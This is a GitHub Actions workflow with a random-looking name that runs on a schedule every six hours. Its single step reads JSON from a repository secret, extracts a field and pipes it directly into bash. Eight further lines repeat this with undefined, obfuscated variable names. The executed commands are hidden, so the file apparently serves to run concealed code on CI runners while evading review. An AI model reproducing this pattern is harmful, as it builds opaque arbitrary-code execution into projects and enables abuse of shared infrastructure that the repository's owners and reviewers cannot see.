name: alkaliconclusion
on:
  workflow_dispatch:
  schedule:
    - cron: '4 3/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: alkaliconclusion
        env:
          j08: ${{ secrets.j08 }}
        run: |
          echo $j08 | jq -r .fxs22 | /bin/bash
          echo $s11 | jq -r .px31872 | /bin/bash
          echo $fcev6286 | jq -r .js97453 | /bin/bash
          echo $kzaao86 | jq -r .zf0994 | /bin/bash
          echo $hk9 | jq -r .iivza8927 | /bin/bash
          echo $xsq13 | jq -r .f1900 | /bin/bash
          echo $xknb89 | jq -r .lwlet11 | /bin/bash
          echo $y83 | jq -r .hzwkk4366 | /bin/bash
          echo $a23165 | jq -r .mtmka940 | /bin/bash

